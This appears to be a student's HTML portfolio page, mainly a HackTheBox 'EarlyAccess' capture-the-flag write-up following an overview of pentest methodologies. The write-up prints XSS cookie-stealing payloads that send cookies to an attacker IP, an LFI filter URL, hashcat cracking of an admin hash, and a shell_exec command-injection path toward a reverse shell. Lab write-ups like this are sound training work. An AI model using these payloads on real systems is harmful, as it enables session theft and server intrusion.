          do think I've the knowledge but I feel like I lack the How-to. I did think I would be
          quite good at defending a network and building one after previous semester, so I think
           it's a combination between a lack of goals and guidance.</p>
          <ul class="list-inline">
          <li>Date: January 2020</li>
          <li>Client: Fontys</li>
          <li>Category: Self reflection</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal19" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Cyber4Z</h2>
          <p class="item-intro text-muted">My internship at Cyber4Z</p>
          <p>DESCRIPTION GOES HERE</p>
          <a href="PICTURE"><img class="img-fluid d-block mx-auto" src="SOURCE" alt=""></a>
          <ul class="list-inline">
          <li>Date: June 2021</li>
          <li>Client: Cyber4Z</li>
          <li>Category: Internship</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal20" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
          <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">Pen-testing methodologies</p>
          <p>The standard and most popular pentest methodology is the Lockheed Martin cyber killchain.
          It's a basic process that explains the order of action a criminal hacker would follow.
          Thus also making it a viable ethical hacker methodology.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyber-kill-chain-process.png" alt=""></a>
          <p>Knowing what step a attacker is taking or needs to take is good to know. But it's also
          good to know how to mitigate or prevent each step of the cyber killchain.</p>
          <a href="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/pentest_methods/cyberkillprev.jpg" alt=""></a>
          <p>Other than the Lockheed Martin cyber killchain there are a few other
          frameworks/methodologies, like the well-known OWASP.</p>
          <ol>
          <li>OSSTMM (Open Source Security Testing Methodology Manual)</li>
          <li>OWASP (Open Web Application Security Project)</li>
          <li>NIST (The National Institute of Standards and Technology)</li>
          <li>PTES (Penetration Testing Methodologies and Standards)</li>
          <li>ISSAF (Information System Security Assessment Framework)</li>
          </ol>
          <a href="https://www.vumetric.com/blog/top-penetration-testing-methodologies/">Source</a>
          <p><b>OSSTMM</b> is a peer-reviewed security assessment standard for testing and auditing
          systems and providing them with a risk score</p>
          <p><b>OWASP</b> is used as a methodology to pentest websites and web applications.</p>
          <p><b>NIST</b> is a very strict standard and they promote themselves as functionality
          driven. They mainly focus on helping federal agencies comply with regulations.</p>
          <p><b>PTES</b> is a structured approach to pentesting and looks a lot like the Lockheed
          Martin cyber killchain.</p>
          <p><b>ISSAF</b> is a pentesting methodology where the pentester imitates a hacker. This also
          looks a lot like the Lockheed Martin cyber killchain.</p>
          <p>Apart from all these methodologies there's another well known entity known by not only
          red teamers but also well-known by the blue teamers. This framework is known as the <a href="https://attack.mitre.org/">Mitre ATT&CK Framework</a> this framework
          contains almost every possible way to attack a network or machine.</p>
          <p>I've used the Mitre ATT&CK framework a lot when monitoring the SOC in my home network.
          Wazuh automatically categorizes the incoming alert in the Mitre ATT&CK framework. On the
          opposite side from te red teamer perspective I've used OWASP and the Lockheed Martin
          cyber killchain a lot. Mostly when performing pentests but also when cracking machines
          on Hackthebox and when participating in CTF events.</p>
          <ul class="list-inline">
          <li>Date: September 2021</li>
          <li>Client: Fontys</li>
          <li>Category: Minor Red-teaming</li>
          </ul>
          <button class="btn btn-primary" data-dismiss="modal" type="button">
          <i class="fas fa-times"></i>
          Close Project
          </button>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          </div>
          
          <div class="portfolio-modal modal fade" id="portfolioModal21" tabindex="-1" role="dialog" aria-hidden="true">
          <div class="modal-dialog">
          <div class="modal-content">
          <div class="close-modal" data-dismiss="modal">
          <div class="lr">
           <div class="rl"></div>
          </div>
          </div>
          <div class="container">
          <div class="row">
          <div class="col-lg-8 mx-auto">
          <div class="modal-body">
          
          <h2 class="text-uppercase">Fontys S7</h2>
          <p class="item-intro text-muted">HackTheBox Linux Write-up</p>
          <a href="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/EarlyAccessCard.png" alt=""></a>
          <p>First lets start with the basic enumeration and do a NMap.</p>
          <code>sudo nmap -v -A -sS earlyaccess.htb</code>
          <a href="img/portfolio/minor/red/htb_linux/NMapOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/NMapOutput.png" alt=""></a>
          <p>From the scan we can see that port 80 (http), 443 (https) and 22 (ssh) are open. Nothing
          special to see here really. Maybe we'll have more luck in finding something with
          GoBuster.</p>
          <code>gobuster dir -x 'php, xml, html, js, css, txt, md' -u earlyaccess.htb -w
          /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/GoBusterOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GoBusterOutput.png" alt=""></a>
          <p>From the looks of it all the tries get redirected and these are all false positives.
          Let's try Ffuf as a last enumeration method in order to find hidden subdomains.</p>
          <code>ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://earlyaccess.htb -H "Host:
          FUZZ.earlyaccess.htb" -mc 200</code>
          <a href="img/portfolio/minor/red/htb_linux/FfufOutput.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FfufOutput.png" alt=""></a>
          <p>Looks like we got a few interesting hits. So I'll add those to my /etc/Hosts file so we
          can take a look at them later on. So let's create a test account on the main page and
          let's see what we can find.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsTestUser.png" alt=""></a>
          <p>Interesting we can see a messaging service, a forum, a store and a place to register a
          key. We can also edit our own account. Let's take a look at the forum.</p>
          <a href="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SingleQuoteForum.png" alt=""></a>
          <p>Some guy on the forum told the staff that his username caused an issue on the scoreboard,
          and because his username is SingleQuoteMan I feel like this is a nod towards either XSS
          or SQLI. We can probably steal a cookie from the admin if we use XSS in our username,
          because it will run when we message a staff member for support.</p>
          <a href="img/portfolio/minor/red/htb_linux/SendingMessage.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SendingMessage.png" alt=""></a>
          <p>Now we'll just need to find a XSS script that will steal the cookie for us so we can use
          it. I tried a fair number of PHP cookie stealers but with out any luck.</p>
          <p> I tried to follow this guide <a href="https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/">https://null-byte.wonderhowto.com/how-to/write-xss-cookie-stealer-javascript-steal-passwords-0180833/</a>
          and tried a number of different XSS scripts.
          </p>
          <code class="prettyprint">&#x3C;img src=x onerror=this.src='http://10.10.14.40:8888/'</code>
          <a href="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PHPCookieStealer.png" alt=""></a>
          <code class="prettyprint">&#x3C;iframe src=http://10.10.14.40:8888/shell.php height=”0”
          width=”0”>&#x3C;/iframe></code>
          <p>But none of these worked. I did manage to steal my own cookie but when I tried stealing
          the admin's I get an "Unsupported ssl" error. So I probably have to make the cookie
          stealer server run on https. But before that I wanted to try to steal it one more time
          without using Java Springboot.</p>
          <a href="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/JavaCookieStealer.png" alt=""></a>
          <p>It was a longshot but worth the try because Springboot does a lot of stuff underwater and
          it just works most of the time. I used another XSS script as well because the other ones
          spammed my terminal full of bogus output.</p>
          <code class="prettyprint">&#x3C;script>document.location="http://10.10.14.88:8888/cookie?c="
          +
          document.cookie&#x3C;/script></code>
          <a href="img/portfolio/minor/red/htb_linux/AdminCookieJava.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AdminCookieJava.png" alt=""></a>
          <p>And this worked! We got the admin cookie now all that's left is to change our cookie to
          the admin's and refresh the page!</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedInAsAdmin.png" alt=""></a>
          <p>We are logged in as admin but now what? From the looks of it we got a few new tabs in the
          navbar. Game and Dev are the subdomains we've already found but admin could be
          interesting.</p>
          <a href="img/portfolio/minor/red/htb_linux/ValidateAPI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/ValidateAPI.png" alt=""></a>
          <p>It is an admin panel mostly used to validate game keys.</p>
          <a href="img/portfolio/minor/red/htb_linux/GameKeyForum.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/GameKeyForum.png" alt=""></a>
          <p>If we look back at the forum we can see that they are having trouble validating the game
          keys and that they resorted to an offline manual method. Let's download the offline key
          validator and see what we can find.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          #!/usr/bin/env python3
                                          import sys
                                          from re import match
          
                                          class Key:
                                          key = ""
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
          
                                          def __init__(self, key:str, magic_num:int=346):
                                          self.key = key
                                          if magic_num != 0:
                                          self.magic_num = magic_num
          
                                          @staticmethod
                                          def info() -> str:
                                          return f"""
                                          # Game-Key validator #
          
                                          Can be used to quickly verify a user's game key, when the API is down (again).
          
                                          Keys look like the following:
                                          AAAAA-BBBBB-CCCC1-DDDDD-1234
          
                                          Usage: {sys.argv[0]}
                                          &#x3C;game-key&#x3E;"""
          
                                              def valid_format(self) -> bool:
                                              return
                                              bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                              self.key))
          
                                              def calc_cs(self) -> int:
                                              gs = self.key.split('-')[:-1]
                                              return sum([sum(bytearray(g.encode())) for g in gs])
          
                                              def g1_valid(self) -> bool:
                                              g1 = self.key.split('-')[0]
                                              r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                              if r != [221, 81, 145]:
                                              return False
                                              for v in g1[3:]:
                                              try:
                                              int(v)
                                              except:
                                              return False
                                              return len(set(g1)) == len(g1)
          
                                              def g2_valid(self) -> bool:
                                              g2 = self.key.split('-')[1]
                                              p1 = g2[::2]
                                              p2 = g2[1::2]
                                              return sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
          
                                              def g3_valid(self) -> bool:
                                              # TODO: Add mechanism to sync magic_num with API
                                              g3 = self.key.split('-')[2]
                                              if g3[0:2] == self.magic_value:
                                              return sum(bytearray(g3.encode())) == self.magic_num
                                              else:
                                              return False
          
                                              def g4_valid(self) -> bool:
                                              return [ord(i)^ord(g) for g, i in zip(self.key.split('-')[0],
                                              self.key.split('-')[3])] == [12, 4, 20, 117, 0]
          
                                              def cs_valid(self) -> bool:
                                              cs = int(self.key.split('-')[-1])
                                              return self.calc_cs() == cs
          
                                              def check(self) -> bool:
                                              if not self.valid_format():
                                              print('Key format invalid!')
                                              return False
                                              if not self.g1_valid():
                                              return False
                                              if not self.g2_valid():
                                              return False
                                              if not self.g3_valid():
                                              return False
                                              if not self.g4_valid():
                                              return False
                                              if not self.cs_valid():
                                              print('[Critical] Checksum verification failed!')
                                              return False
                                              return True
          
                                              if __name__ == "__main__":
                                              if len(sys.argv) != 2:
                                              print(Key.info())
                                              sys.exit(-1)
                                              input = sys.argv[1]
                                              validator = Key(input)
                                              if validator.check():
                                              print(f"Entered key is valid!")
                                              else:
                                              print(f"Entered key is invalid!")
                                      </code>
                                      </pre>
          <p>This is the original code it looks like they validate the key in parts so if we can
          reverse engineer these parts we can find out how to crack the key.</p>
          <a href="img/portfolio/minor/red/htb_linux/PythonCompiler.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/PythonCompiler.png" alt=""></a>
          <p>I put the Python code in an online compiler and removed all the functions and made it
          into a script. Then I put all the results in variables so we can see if a try is
          valid.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          from re import match
          
                                          class Key:
                                          key = "KEY01-0H0H0-XPAA0-GAME1-1295" #defaultkey=AAAAA-BBBBB-CCCC1-DDDDD-1234
                                          magic_value = "XP" # Static (same on API)
                                          magic_num = 346 # TODO: Sync with API (api generates magic_num every 30min)
                                          valid = False
                                          cs_value = 0
                                          cs_valid = False
                                          g1_valid = False
                                          g2_valid = False
                                          g3_valid = False
                                          g4_valid = False
          
                                          valid =
                                          bool(match(r"^[A-Z0-9]{5}(-[A-Z0-9]{5})(-[A-Z]{4}[0-9])(-[A-Z0-9]{5})(-[0-9]{1,5})$",
                                          key))
                                          print("valid_format: ", valid)
          
                                          gs = key.split('-')[:-1]
                                          cs_value = sum([sum(bytearray(g.encode())) for g in gs])
                                          print("cs_value: ", cs_value)
          
                                          ### g1 discovered by changing the first 3 characters untill the r value matched
                                          g1 = key.split('-')[0]
                                          r = [(ord(v)<&#x3C;i+1)%256^ord(v) for i, v in enumerate(g1[0:3])]
                                          print("r: ", r)
                                          if r != [221, 81, 145]:
                                          g1_valid = False
                                          for v in g1[3:]:
                                          try:
                                          int(v)
                                          except:
                                          g1_valid = False
                                          g1_valid = len(set(g1)) == len(g1)
                                          print("g1_valid: ", g1_valid)
          
                                          ### g2 discovered by putting p1 on 0 and shifting p2 until it matched
                                          g2 = key.split('-')[1]
                                          p1 = g2[::2]
                                          p2 = g2[1::2]
                                          g2_valid = sum(bytearray(p1.encode())) == sum(bytearray(p2.encode()))
                                          print("g2_valid: ", g2_valid)
          
                                          # TODO: Add mechanism to sync magic_num with API
                                          g3 = key.split('-')[2]
                                          if g3[0:2] == magic_value:
                                          g3_valid = sum(bytearray(g3.encode())) == magic_num
                                          else:
                                          g3_valid = False
                                          print("g3_valid: ", g3_valid)
          
                                          ### Same approach as g1 try different values untill they matched
                                          print("g4: ", [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])])
                                          g4_valid = [ord(i)^ord(g) for g, i in zip(key.split('-')[0], key.split('-')[3])] == [12,
                                          4, 20, 117, 0]
                                          print("g4_valid: ", g4_valid)
          
                                          ### The CS value is just a byte sum of the whole key so this has to be the last value to
                                          crack and is pretty easy because we can just print the real CS value and match it
                                          cs = int(key.split('-')[-1])
                                          print("cs: ", cs)
                                          cs_valid = cs_value == cs
                                          print("cs_valid: ", cs_valid)
          
                                          def check(self) -> bool:
                                          if not self.valid_format():
                                          print('Key format invalid!')
                                          return False
                                          if not self.g1_valid():
                                          return False
                                          if not self.g2_valid():
                                          return False
                                          if not self.g3_valid():
                                          return False
                                          if not self.g4_valid():
                                          return False
                                          if not self.cs_valid():
                                          print('[Critical] Checksum verification failed!')
                                          return False
                                          return True
                                      </code>
                                      </pre>
          <a href="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LocalKeyValidate.png" alt=""></a>
          <p>We cracked the code but the only thing that didn't work is part G3 because the magic
           number seems to be different on the server. When we try to validate it locally using the
          original validator script the key is valid. But maybe we can bruteforce this magic
          number using Burpsuite. There are only 60 possible combinations because the magic number
          is a sum of the last 3 characters, because the code said that the first two "XP" are
          static, And each character has a specific value. So I made a list.</p>
          <pre style="text-align: left">                            <code class="prettyprint">
                                          KEY01-0H0H0-XPAA0-GAME1-1295
                                          KEY01-0H0H0-XPAB0-GAME1-1296
                                          KEY01-0H0H0-XPAC0-GAME1-1297
                                          KEY01-0H0H0-XPAD0-GAME1-1298
                                          KEY01-0H0H0-XPAE0-GAME1-1299
                                          KEY01-0H0H0-XPAF0-GAME1-1300
                                          KEY01-0H0H0-XPAG0-GAME1-1301
                                          KEY01-0H0H0-XPAH0-GAME1-1302
                                          KEY01-0H0H0-XPAI0-GAME1-1303
                                          KEY01-0H0H0-XPAJ0-GAME1-1304
                                          KEY01-0H0H0-XPAK0-GAME1-1305
                                          KEY01-0H0H0-XPAL0-GAME1-1306
                                          KEY01-0H0H0-XPAM0-GAME1-1307
                                          KEY01-0H0H0-XPAN0-GAME1-1308
                                          KEY01-0H0H0-XPAO0-GAME1-1309
                                          KEY01-0H0H0-XPAP0-GAME1-1310
                                          KEY01-0H0H0-XPAQ0-GAME1-1311
                                          KEY01-0H0H0-XPAR0-GAME1-1312
                                          KEY01-0H0H0-XPAS0-GAME1-1313
                                          KEY01-0H0H0-XPAT0-GAME1-1314
                                          KEY01-0H0H0-XPAU0-GAME1-1315
                                          KEY01-0H0H0-XPAV0-GAME1-1316
                                          KEY01-0H0H0-XPAW0-GAME1-1317
                                          KEY01-0H0H0-XPAX0-GAME1-1318
                                          KEY01-0H0H0-XPAY0-GAME1-1319
                                          KEY01-0H0H0-XPAZ0-GAME1-1320
                                          KEY01-0H0H0-XPBZ0-GAME1-1321
                                          KEY01-0H0H0-XPCZ0-GAME1-1322
                                          KEY01-0H0H0-XPDZ0-GAME1-1323
                                          KEY01-0H0H0-XPEZ0-GAME1-1324
                                          KEY01-0H0H0-XPFZ0-GAME1-1325
                                          KEY01-0H0H0-XPGZ0-GAME1-1326
                                          KEY01-0H0H0-XPHZ0-GAME1-1327
                                          KEY01-0H0H0-XPIZ0-GAME1-1328
                                          KEY01-0H0H0-XPJZ0-GAME1-1329
                                          KEY01-0H0H0-XPKZ0-GAME1-1330
                                          KEY01-0H0H0-XPLZ0-GAME1-1331
                                          KEY01-0H0H0-XPMZ0-GAME1-1332
                                          KEY01-0H0H0-XPNZ0-GAME1-1333
                                          KEY01-0H0H0-XPOZ0-GAME1-1334
                                          KEY01-0H0H0-XPPZ0-GAME1-1335
                                          KEY01-0H0H0-XPQZ0-GAME1-1336
                                          KEY01-0H0H0-XPRZ0-GAME1-1337
                                          KEY01-0H0H0-XPSZ0-GAME1-1338
                                          KEY01-0H0H0-XPTZ0-GAME1-1339
                                          KEY01-0H0H0-XPUZ0-GAME1-1340
                                          KEY01-0H0H0-XPVZ0-GAME1-1341
                                          KEY01-0H0H0-XPWZ0-GAME1-1342
                                          KEY01-0H0H0-XPXZ0-GAME1-1343
                                          KEY01-0H0H0-XPYZ0-GAME1-1344
                                          KEY01-0H0H0-XPZZ0-GAME1-1345
                                          KEY01-0H0H0-XPZZ1-GAME1-1346
                                          KEY01-0H0H0-XPZZ2-GAME1-1347
                                          KEY01-0H0H0-XPZZ3-GAME1-1348
                                          KEY01-0H0H0-XPZZ4-GAME1-1349
                                          KEY01-0H0H0-XPZZ5-GAME1-1350
                                          KEY01-0H0H0-XPZZ6-GAME1-1351
                                          KEY01-0H0H0-XPZZ7-GAME1-1352
                                          KEY01-0H0H0-XPZZ8-GAME1-1353
                                          KEY01-0H0H0-XPZZ9-GAME1-1354
                                      </code>
                                      </pre>
          <p>First we need to intercept to post so we can copy it.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteIntercept.png" alt=""></a>
          <p>Now we can send it to the intruder to start brute-forcing this magic number.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePayload.png" alt=""></a>
          <p>I've added the payload which is the list of possible combinations we've just compiled.
          Now we need to add it into the POST.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuitePOST.png" alt=""></a>
          <p>Now let's start attacking!</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteFailedAttack.png" alt=""></a>
          <p>That didn't go as planned it looks like all the requests got redirected let's look at the
          settings if we can change anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAllowRedirect.png" alt=""></a>
          <p>Looks like Burpsuite just needed to be allowed to follow redirects. This is probably also
          the reason why our first GoBuster attempt failed.</p>
          <a href="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/BurpsuiteAttack.png" alt=""></a>
          <p>Now to second attack is way more promising. One key stands out because the response
          length is different from the rest. Let's try that key and see what happens.</p>
          <a href="img/portfolio/minor/red/htb_linux/KeyValidationTest.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/KeyValidationTest.png" alt=""></a>
          <p>And it worked! Now lets go back to our normal user account and add this key to our
          account.</p>
          <a href="img/portfolio/minor/red/htb_linux/AddKeyToUser.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/AddKeyToUser.png" alt=""></a>
          <p>Now we got the key added to our account we can take a look at that game subdomain we
           found earlier.</p>
          <a href="img/portfolio/minor/red/htb_linux/Scoreboard.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Scoreboard.png" alt=""></a>
          <p>Something I noticed instantly is the scoreboard that the SingleQuoteMan talked about on
          the forum. Maybe we can do the same trick with SQLI as we did with XSS at the beginning.
          We can do a simple SQLI test to find out if it's vulnerable.</p>
          <a href="img/portfolio/minor/red/htb_linux/VulnForSQLI.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/VulnForSQLI.png" alt=""></a>
          <p>It is vulnerable but we didn't match the columns hence why it didn't show any output so
          lets try that again.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLVersion.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLVersion.png" alt=""></a>
          <p>Now look at that this should be easy. Lets try to enumerate the database tables.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIDBDump.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIDBDump.png" alt=""></a>
          <p>A user table? Very interesting lets see if it contains any passwords or usernames.</p>
          <a href="img/portfolio/minor/red/htb_linux/SQLIUsers.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SQLIUsers.png" alt=""></a>
          <p>And it does! Looks like we got an admin username and a password hash we need to crack.
          But first lets find out what type of hash it is.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashIdentifier.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashIdentifier.png" alt=""></a>
          <p>Looks like it's a SHA1 hash lets see if Hashcat can find the password for us.</p>
          <code>hashcat -a 0 -m 100 adminhash.txt /usr/share/wordlists/rockyou.txt</code>
          <a href="img/portfolio/minor/red/htb_linux/Hashcat.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Hashcat.png" alt=""></a>
          <p>Yes it can! Now lets try to use these credentials to log into the dev subdomain.</p>
          <a href="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/LoggedIntoDev.png" alt=""></a>
          <p>Lets try to run Dirbuster one more time to see if it finds anything.</p>
          <a href="img/portfolio/minor/red/htb_linux/Dirbuster.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/Dirbuster.png" alt=""></a>
          <p>Almost forgot we have to add the PHPSESSID from this admin to Dirbuster otherwise it
          won't have access to enumerate the site.</p>
          <a href="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DirbusterPHPSESSID.png" alt=""></a>
          <p>Dirtbuster found a file called /actions/file.php which could be interesting. By the looks
          of it this is the file that is running on the homepage of this subdomain as well but
          there it said it didn't have a GUI yet. Maybe we can use it without GUI now we know the
          location of the file. But we need to know the command because now it gives us an
          error.</p>
          <a href="img/portfolio/minor/red/htb_linux/SpecifyFile.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/SpecifyFile.png" alt=""></a>
          <p>Lets try some common command in this context like file, path and filepath. Hey! Filepath
          worked and now we can execute files and apparently also the hashingTool that is also on
          the homepage.</p>
          <a href="img/portfolio/minor/red/htb_linux/FileExecuted.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/FileExecuted.png" alt=""></a>
          <p>Lets take a look at LFI (Local File Inclusion) and see if we can do something with that.
          I've found this <a href="https://medium.com/@nyomanpradipta120/local-file-inclusion-vulnerability-cfd9e62d12cb">website</a>
          that explains a LFI vulnerability we could try</p>
          <code>https://dev.earlyaccess.htb/actions/file.php?filepath=php://filter/convert.base64-encode/resource=/var/www/earlyaccess.htb/dev/actions/hash.php</code>
          <a href="img/portfolio/minor/red/htb_linux/HashBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashBase64.png" alt=""></a>
          <p>This gave us the base64 of the hash.php file if we can convert it back to code we might
          be able to find a vulnerability.</p>
          <a href="img/portfolio/minor/red/htb_linux/DecodedBase64.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/DecodedBase64.png" alt=""></a>
          <p>Using an online base64 decoder we managed to find the source code of the hash.php
          file.</p>
          <pre style="text-align: left">                                <code class="prettyprint">
                                              &#x3C;?php
                                              include_once "../includes/session.php";
          
                                              function hash_pw($hash_function, $password)
                                              {
                                                  // DEVELOPER-NOTE: There has gotta be an easier way...
                                                  ob_start();
                                                  // Use inputted hash_function to hash password
                                                  $hash = @$hash_function($password);
                                                  ob_end_clean();
                                                  return $hash;
                                              }
          
                                              try
                                              {
                                                  if(isset($_REQUEST['action']))
                                                  {
                                                      if($_REQUEST['action'] === "verify")
                                                      {
                                                          // VERIFIES $password AGAINST $hash
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['hash']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
          
                                                              $_SESSION['verify'] = ($hash === $_REQUEST['hash']);
                                                              header('Location: /home.php?tool=hashing');
                                                              return;
                                                          }
                                                      }
                                                      elseif($_REQUEST['action'] === "verify_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE VERIFICATION
                                                      }
                                                      elseif($_REQUEST['action'] === "hash_file")
                                                      {
                                                          //TODO: IMPLEMENT FILE-HASHING
                                                      }
                                                      elseif($_REQUEST['action'] === "hash")
                                                      {
                                                          // HASHES $password USING $hash_function
          
                                                          if(isset($_REQUEST['hash_function']) && isset($_REQUEST['password']))
                                                          {
                                                              // Only allow custom hashes, if `debug` is set
                                                              if($_REQUEST['hash_function'] !== "md5" && $_REQUEST['hash_function'] !== "sha1" && !isset($_REQUEST['debug']))
                                                                  throw new Exception("Only MD5 and SHA1 are currently supported!");
          
                                                              $hash = hash_pw($_REQUEST['hash_function'], $_REQUEST['password']);
                                                              if(!isset($_REQUEST['redirect']))
                                                              {
                                                                  echo "Result for Hash-function (" . $_REQUEST['hash_function'] . ") and password (" . $_REQUEST['password'] . "):&#x3C;br>";
                                                                  echo '&#x3C;br>' . $hash;
                                                                  return;
                                                              }
                                                              else
                                                              {
                                                                  $_SESSION['hash'] = $hash;
                                                                  header('Location: /home.php?tool=hashing');
                                                                  return;
                                                              }
                                                          }
                                                      }
                                                  }
                                                  // Action not set, ignore
                                                  throw new Exception("");
                                              }
                                              catch(Exception $ex)
                                              {
                                                  if($ex->getMessage() !== "")
                                                      $_SESSION['error'] = htmlentities($ex->getMessage());
          
                                                  header('Location: /home.php');
                                                  return;
                                              }
                                              ?>
                                          </code>
                                      </pre>
          <p>After analyzing the source code it looks like if you send the debug parameter as true and
          the hashing_function as shell_exec, you
          can run any shell command you want from the hashing tool. So lets try that.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSPOST.png" alt=""></a>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolLSResult.png" alt=""></a>
          <p>Looks like it worked now lets try to get a reverse shell.</p>
          <a href="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png"><img class="img-fluid d-block mx-auto" src="img/portfolio/minor/red/htb_linux/HashingToolReverseShell.png" alt=""></a>
